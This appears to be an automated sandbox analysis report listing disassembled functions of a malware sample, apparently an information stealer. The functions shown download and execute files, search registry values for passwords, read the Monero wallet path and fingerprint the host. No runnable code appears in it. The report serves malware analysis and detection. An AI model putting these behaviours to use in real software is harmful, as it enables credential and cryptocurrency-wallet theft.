                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                                      • String ID:
                                                      • API String ID: 4230089145-0
                                                      • Opcode ID: e19d0bf03348247b6e4e2eb8500c66dd98e7d1c051ca1e120ba3398100732841
                                                      • Instruction ID: 068dc03c6f3b92b57b3995c100a45963ad3eb462d89b6c9804b1454a34ea4421
                                                      • Opcode Fuzzy Hash: e19d0bf03348247b6e4e2eb8500c66dd98e7d1c051ca1e120ba3398100732841
                                                      • Instruction Fuzzy Hash: E3613EB590011CABDB54EF64CC44ADD77B6BF88304F1489A9FA09A3250EB74AF85DF90
                                                      Function 00406AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00406AFF
                                                      • InternetOpenA.WININET(Function_0002CFF4,00000001,00000000,00000000,00000000), ref: 00406B2C
                                                      • StrCmpCA.SHLWAPI(?,02D8F9D0), ref: 00406B4A
                                                      • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00406B6A
                                                      • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406B88
                                                      • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00406BA1
                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00406BC6
                                                      • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00406BF0
                                                      • CloseHandle.KERNEL32(00000000), ref: 00406C10
                                                      • InternetCloseHandle.WININET(00000000), ref: 00406C17
                                                      • InternetCloseHandle.WININET(?), ref: 00406C21
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                                      • String ID:
                                                      • API String ID: 2500263513-0
                                                      • Opcode ID: 69fc046c24c7f83ecb64c48bb5c3c38190310dbc90be8005094d24f15f1b0342
                                                      • Instruction ID: 28f6004d9fc435b827a3bc8f9bbe67469d36c8410753c23a53a3daf2e3da10f0
                                                      • Opcode Fuzzy Hash: 69fc046c24c7f83ecb64c48bb5c3c38190310dbc90be8005094d24f15f1b0342
                                                      • Instruction Fuzzy Hash: E64171B1600215ABDB24DF64DC89FAE77B9EB44704F004469FA06E72C0DF74AE448BA8
                                                      Function 02C94C57 Relevance: 16.5, APIs: 11, Instructions: 48libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(0043517C,?,02C8764B), ref: 02C94C5D
                                                      • GetProcAddress.KERNEL32(00000000,00435188), ref: 02C94C73
                                                      • GetProcAddress.KERNEL32(00000000,00435190), ref: 02C94C84
                                                      • GetProcAddress.KERNEL32(00000000,0043519C), ref: 02C94C95
                                                      • GetProcAddress.KERNEL32(00000000,004351A8), ref: 02C94CA6
                                                      • GetProcAddress.KERNEL32(00000000,004351B0), ref: 02C94CB7
                                                      • GetProcAddress.KERNEL32(00000000,004351BC), ref: 02C94CC8
                                                      • GetProcAddress.KERNEL32(00000000,004351C4), ref: 02C94CD9
                                                      • GetProcAddress.KERNEL32(00000000,004351CC), ref: 02C94CEA
                                                      • GetProcAddress.KERNEL32(00000000,004351DC), ref: 02C94CFB
                                                      • GetProcAddress.KERNEL32(00000000,004351E8), ref: 02C94D0C
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID:
                                                      • API String ID: 2238633743-0
                                                      • Opcode ID: 7c009115eff614aabd79fc5db8e1c27ef2ce098b719a4c71c1e5a7c52ab7418c
                                                      • Instruction ID: cf46219cf28b3827e05b2f6f4a00d0972bd52fd93b0889aa9dc018629e0313bc
                                                      • Opcode Fuzzy Hash: 7c009115eff614aabd79fc5db8e1c27ef2ce098b719a4c71c1e5a7c52ab7418c
                                                      • Instruction Fuzzy Hash: 11119676D52720AF8B149BA5AD0DB9A3ABABA0E70A714381BF551D3160DBF84400DFE4
                                                      Function 02C8CAC5 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 127stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 02C97787: lstrlen.KERNEL32(------,02C75E52), ref: 02C97792
                                                        • Part of subcall function 02C97787: lstrcpy.KERNEL32(00000000), ref: 02C977B6
                                                        • Part of subcall function 02C97787: lstrcat.KERNEL32(?,------), ref: 02C977C0
                                                        • Part of subcall function 02C976F7: lstrcpy.KERNEL32(00000000), ref: 02C97725
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8CB0C
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8CB35
                                                      • ShellExecuteEx.SHELL32(0000003C), ref: 02C8CC28
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$ExecuteShelllstrcatlstrlen
                                                      • String ID: /i "$ /passive$.msi$<$hKC$NC
                                                      • API String ID: 619169029-2209698126
                                                      • Opcode ID: 640784f9607d2f9082c644e33c2d8e6626333806b75daac8714daac5573c0bab
                                                      • Instruction ID: 75ae3d0e0f9e30691cc08b20379c29529b5680f56992e8aaec0754cad21c21e1
                                                      • Opcode Fuzzy Hash: 640784f9607d2f9082c644e33c2d8e6626333806b75daac8714daac5573c0bab
                                                      • Instruction Fuzzy Hash: AC417FB5D1125A8BCB14FFB9CC8599CB7B2AF54308F1084A9D805E7610DB34AE8ADF90
                                                      Function 00407A60 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004077D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00407805
                                                        • Part of subcall function 004077D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0040784A
                                                        • Part of subcall function 004077D0: strlen.MSVCRT ref: 0040787E
                                                        • Part of subcall function 004077D0: StrStrA.SHLWAPI(?,Password), ref: 004078B8
                                                        • Part of subcall function 004077D0: strcpy_s.MSVCRT ref: 004078E1
                                                        • Part of subcall function 004077D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004078EC
                                                        • Part of subcall function 004077D0: HeapFree.KERNEL32(00000000), ref: 004078F3
                                                        • Part of subcall function 004077D0: strlen.MSVCRT ref: 00407900
                                                      • lstrcatA.KERNEL32(00000000,00434ADC), ref: 00407A90
                                                      • lstrcatA.KERNEL32(00000000,?), ref: 00407ABD
                                                      • lstrcatA.KERNEL32(00000000, : ), ref: 00407ACF
                                                      • lstrcatA.KERNEL32(00000000,?), ref: 00407AF0
                                                      • wsprintfA.USER32 ref: 00407B10
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00407B39
                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 00407B47
                                                      • lstrcatA.KERNEL32(00000000,00434ADC), ref: 00407B60
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcat$Heapstrlen$EnumFreeOpenProcessValuelstrcpystrcpy_swsprintf
                                                      • String ID: :
                                                      • API String ID: 2460923012-3653984579
                                                      • Opcode ID: 048048d0af968568ffa48ceefb577d359e3e4e0aeb776ddaf19cf8653dfb829e
                                                      • Instruction ID: e84d9cfcc29a26c52425093129385012f453173fe785cac49ef106dd3e8f94e1
                                                      • Opcode Fuzzy Hash: 048048d0af968568ffa48ceefb577d359e3e4e0aeb776ddaf19cf8653dfb829e
                                                      • Instruction Fuzzy Hash: FD319572E04214AFCB14EBA4DC449ABB77AEB88704F14552EF605A3390DB78F941CBA5
                                                      Function 02C7BE60 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C7BE86
                                                      • lstrlen.KERNEL32(00000000), ref: 02C7BEB9
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C7BEE3
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C7BEEB
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C7BF13
                                                      • lstrlen.KERNEL32(00434ADC), ref: 02C7BF8A
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrlen$lstrcat
                                                      • String ID:
                                                      • API String ID: 2500673778-0
                                                      • Opcode ID: 8783f025f7d8f793a09bf476b3931c136a61ddc7f50b417c02b46b450a9afe73
                                                      • Instruction ID: b7aa3a6f55c1b2e662cb983b9ab2e0b20b54c2acb2bbc43926279c321d9d6731
                                                      • Opcode Fuzzy Hash: 8783f025f7d8f793a09bf476b3931c136a61ddc7f50b417c02b46b450a9afe73
                                                      • Instruction Fuzzy Hash: AAA19174A016068FDB14EF69DD48AADB7F2EF8430CF148069E8099B260DB32DE45DF91
                                                      Function 00418020 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 118stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • strtok_s.MSVCRT ref: 00418044
                                                      • lstrlenA.KERNEL32(00000000), ref: 00418071
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 004180A0
                                                      • strtok_s.MSVCRT ref: 004180B1
                                                      • StrCmpCA.SHLWAPI(00000000,00434C44), ref: 004180E5
                                                      • StrCmpCA.SHLWAPI(00000000,00434C44), ref: 00418113
                                                      • StrCmpCA.SHLWAPI(00000000,00434C44), ref: 00418147
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: strtok_s$lstrcpylstrlen
                                                      • String ID: FB
                                                      • API String ID: 348468850-3916161110
                                                      • Opcode ID: 78ccadcbcc81424dbf196b1247e5b728eea2e2e6a80fdb9a28569e00993411d2
                                                      • Instruction ID: 404eea85ac803e185aee75a90389890c071ad2b647f6dd4514bd3fc7a5dfdf25
                                                      • Opcode Fuzzy Hash: 78ccadcbcc81424dbf196b1247e5b728eea2e2e6a80fdb9a28569e00993411d2
                                                      • Instruction Fuzzy Hash: 3041527060011ADFCB21DF58D884ADA7BF4FF59300B12415EE809D7350DB75AA9ACF95
                                                      Function 02C996E4 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __getptd.LIBCMT ref: 02C996F0
                                                        • Part of subcall function 02C98C76: __getptd_noexit.LIBCMT ref: 02C98C79
                                                        • Part of subcall function 02C98C76: __amsg_exit.LIBCMT ref: 02C98C86
                                                      • __amsg_exit.LIBCMT ref: 02C99710
                                                      • __lock.LIBCMT ref: 02C99720
                                                      • InterlockedDecrement.KERNEL32(?), ref: 02C9973D
                                                      • free.MSVCRT ref: 02C99750
                                                      • InterlockedIncrement.KERNEL32(XuC), ref: 02C99768
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                                      • String ID: XuC$XuC
                                                      • API String ID: 634100517-965221565
                                                      • Opcode ID: 020f135a77a2bf4c8e551a451e6f34798df094e9785368ae935b27bc8f0fed19
                                                      • Instruction ID: 1416c2a835bc588488d4e5498ef80a52993a2fb2a79ddb1fa54d4671bb602751
                                                      • Opcode Fuzzy Hash: 020f135a77a2bf4c8e551a451e6f34798df094e9785368ae935b27bc8f0fed19
                                                      • Instruction Fuzzy Hash: 1E01B5B2D06B11EBDF31AF29984C75DB361BF44B10F050919E814A7290DF39AA41DFDA
                                                      Function 00409DE0 Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 182memorystringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • memcmp.MSVCRT(?,v20,00000003), ref: 00409E04
                                                      • memcmp.MSVCRT(?,v10,00000003), ref: 00409E42
                                                      • memset.MSVCRT ref: 00409E6F
                                                      • LocalAlloc.KERNEL32(00000040), ref: 00409EA7
                                                        • Part of subcall function 004273F0: lstrcpy.KERNEL32(00000000,ERROR), ref: 0042740E
                                                      • lstrcpy.KERNEL32(00000000,00434C50), ref: 00409FB2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpymemcmp$AllocLocalmemset
                                                      • String ID: @$v10$v20
                                                      • API String ID: 3420379846-278772428
                                                      • Opcode ID: 8f9f0b0b11b8fb0923c818a210df775e9b900304ec7394e5aa2be54dfe3a81c9
                                                      • Instruction ID: b27ac19f8012b4087446923005e17a34a10f3cc1b5abaf47948a7831dd99fe03
                                                      • Opcode Fuzzy Hash: 8f9f0b0b11b8fb0923c818a210df775e9b900304ec7394e5aa2be54dfe3a81c9
                                                      • Instruction Fuzzy Hash: BB51AE31B002059BCB10EF6ADC45B9E77A4AF50318F15503AF909FB2D2DBB8ED058B98
                                                      Function 02C8E490 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8E4B6
                                                      • lstrcat.KERNEL32(?,00000000), ref: 02C8E4C4
                                                      • lstrcat.KERNEL32(?,?), ref: 02C8E4DF
                                                      • lstrcat.KERNEL32(?,?), ref: 02C8E4F3
                                                      • lstrcat.KERNEL32(?,00638A84), ref: 02C8E507
                                                      • lstrcat.KERNEL32(?,?), ref: 02C8E51B
                                                      • lstrcat.KERNEL32(?,00638AC8), ref: 02C8E52E
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8E566
                                                      • GetFileAttributesA.KERNEL32(00000000), ref: 02C8E56D
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcat$lstrcpy$AttributesFile
                                                      • String ID:
                                                      • API String ID: 3428472996-0
                                                      • Opcode ID: 50497141c4dc9b5dfcf57323228a0a017200a2c71b7d8417b3d616d678081977
                                                      • Instruction ID: ad7bc4c6253b2f4aabee6e7df9a9247309b136e505dfdc46b2598c02abac20c7
                                                      • Opcode Fuzzy Hash: 50497141c4dc9b5dfcf57323228a0a017200a2c71b7d8417b3d616d678081977
                                                      • Instruction Fuzzy Hash: 6C417D759001289BCB15EF64CC88ADD77B6FF98304F0489A9F90993250EB749F89DFA1
                                                      Function 02C8C732 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 145stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 02C97787: lstrlen.KERNEL32(------,02C75E52), ref: 02C97792
                                                        • Part of subcall function 02C97787: lstrcpy.KERNEL32(00000000), ref: 02C977B6
                                                        • Part of subcall function 02C97787: lstrcat.KERNEL32(?,------), ref: 02C977C0
                                                        • Part of subcall function 02C976F7: lstrcpy.KERNEL32(00000000), ref: 02C97725
                                                        • Part of subcall function 02C97737: lstrcpy.KERNEL32(00000000), ref: 02C97766
                                                        • Part of subcall function 02C97737: lstrcat.KERNEL32(00000000), ref: 02C97772
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8C826
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8C84F
                                                      • ShellExecuteEx.SHELL32(0000003C), ref: 02C8C8BB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                      • String ID: "" $<$hKC$hKC
                                                      • API String ID: 3031569214-169242861
                                                      • Opcode ID: 8cf60b048508fbb5409c62d790346db81c95bf04b9d489826a6e43704e5bd255
                                                      • Instruction ID: 40dbb5406b4ed5b1f21988f576bf2d12e5777f0520b09d229cacce3045b90193
                                                      • Opcode Fuzzy Hash: 8cf60b048508fbb5409c62d790346db81c95bf04b9d489826a6e43704e5bd255
                                                      • Instruction Fuzzy Hash: 5D516DB1D112958BCB14FFB9DC8499CB7B2AF94308F1584B9D905E7610DA30AE4ADF90
                                                      Function 02C8C8EC Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 136stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 02C97787: lstrlen.KERNEL32(------,02C75E52), ref: 02C97792
                                                        • Part of subcall function 02C97787: lstrcpy.KERNEL32(00000000), ref: 02C977B6
                                                        • Part of subcall function 02C97787: lstrcat.KERNEL32(?,------), ref: 02C977C0
                                                        • Part of subcall function 02C976F7: lstrcpy.KERNEL32(00000000), ref: 02C97725
                                                        • Part of subcall function 02C97737: lstrcpy.KERNEL32(00000000), ref: 02C97766
                                                        • Part of subcall function 02C97737: lstrcat.KERNEL32(00000000), ref: 02C97772
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8C9E2
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8CA0B
                                                      • ShellExecuteEx.SHELL32(0000003C), ref: 02C8CA6B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                      • String ID: .dll$<$XLC$hKC
                                                      • API String ID: 3031569214-2133350058
                                                      • Opcode ID: c470ad0c4a476ad6f9457df6e99dc83b6f1dfc8336a38464864dc0b9c5fd1a26
                                                      • Instruction ID: d180c79821793bf1a246ca437b8ca5485fc9be5a5074fb03e0cc3f71c84336b8
                                                      • Opcode Fuzzy Hash: c470ad0c4a476ad6f9457df6e99dc83b6f1dfc8336a38464864dc0b9c5fd1a26
                                                      • Instruction Fuzzy Hash: D2516FB19112998BCF10FFB9CC8559CB7B2AF94308F5184B9D805E7610DB349E8ADF80
                                                      Function 02C92B77 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 02C92BB2
                                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,02C8976D,00000000,00000000,00000000,00000000), ref: 02C92BE3
                                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02C92C46
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02C92C4D
                                                      • wsprintfA.USER32 ref: 02C92C72
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                                      • String ID: :\$C
                                                      • API String ID: 2572753744-3309953409
                                                      • Opcode ID: 013d7a5abd80eb44982cec66597c927420344f608520c3a884e76de014233dcd
                                                      • Instruction ID: 370029e30627f7d372b3ba2e1b5ada6ad17ba941e46551f486fc5d2f58b7898f
                                                      • Opcode Fuzzy Hash: 013d7a5abd80eb44982cec66597c927420344f608520c3a884e76de014233dcd
                                                      • Instruction Fuzzy Hash: A23185B1D08209AFCB04CFB88D45AEEFFBDEB58350F004169E545E7650E2348B40CBA2
                                                      Function 00401120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401135
                                                      • HeapAlloc.KERNEL32(00000000), ref: 0040113C
                                                      • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00401159
                                                      • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401173
                                                      • RegCloseKey.ADVAPI32(?), ref: 0040117D
                                                      Strings
                                                      • SOFTWARE\monero-project\monero-core, xrefs: 0040114F
                                                      • wallet_path, xrefs: 0040116D
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                      • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                      • API String ID: 3466090806-4244082812
                                                      • Opcode ID: 3eabf35694fb7367b255f32a536ab17974b5ca8c4e5d7cae6c54b1374e0763a8
                                                      • Instruction ID: 429a39cc595111bc57384dbb44951e00fba51e8d3c52ba565137f0064186628b
                                                      • Opcode Fuzzy Hash: 3eabf35694fb7367b255f32a536ab17974b5ca8c4e5d7cae6c54b1374e0763a8
                                                      • Instruction Fuzzy Hash: D7F06D75A40308BFD7049BA09C89FEB7B7DEB04755F100059FE05E2290D6B05A448BE0
                                                      Function 02C79327 Relevance: 12.2, APIs: 8, Instructions: 161networkfilestringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetOpenA.WININET(0042CFF4,00000001,00000000,00000000,00000000), ref: 02C79346
                                                      • InternetOpenUrlA.WININET(00000000,00434B2C,00000000,00000000,80000000,00000000), ref: 02C79363
                                                      • InternetCloseHandle.WININET(00000000), ref: 02C79370
                                                        • Part of subcall function 02C881D7: memchr.MSVCRT ref: 02C88216
                                                        • Part of subcall function 02C881D7: memcmp.MSVCRT(00000000,?,?,?,00434B48,00000000), ref: 02C88230
                                                        • Part of subcall function 02C881D7: memchr.MSVCRT ref: 02C8824F
                                                        • Part of subcall function 02C78BE7: std::_Xinvalid_argument.LIBCPMT ref: 02C78BFD
                                                      • strlen.MSVCRT ref: 02C7938C
                                                      • InternetReadFile.WININET(?,?,?,00000000), ref: 02C793CD
                                                      • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02C793FE
                                                      • InternetCloseHandle.WININET(00000000), ref: 02C79409
                                                      • InternetCloseHandle.WININET(00000000), ref: 02C79410
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$CloseHandle$FileOpenReadmemchr$Xinvalid_argumentmemcmpstd::_strlen
                                                      • String ID:
                                                      • API String ID: 1093921401-0
                                                      • Opcode ID: ec4cbb5dbbd37489c1cf68316e3847bbf2b1f5292038445eee392468e9e8c8fb
                                                      • Instruction ID: 942be307469feda5a992f30240a003ac60a7235fa1a62843a77e29bd833c31b7
                                                      • Opcode Fuzzy Hash: ec4cbb5dbbd37489c1cf68316e3847bbf2b1f5292038445eee392468e9e8c8fb
                                                      • Instruction Fuzzy Hash: 5051E9716002045BD720DBA8DC44BEEF7FAEB88714F14416AF505E32C0DBB4E644DBA5
                                                      Function 00405640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040565A
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00405661
                                                      • InternetOpenA.WININET(Function_0002CFF4,00000000,00000000,00000000,00000000), ref: 00405677
                                                      • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00405692
                                                      • InternetReadFile.WININET(?,?,00000400,00000001), ref: 004056BC
                                                      • memcpy.MSVCRT(00000000,?,00000001), ref: 004056E1
                                                      • InternetCloseHandle.WININET(?), ref: 004056FA
                                                      • InternetCloseHandle.WININET(00000000), ref: 00405701
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
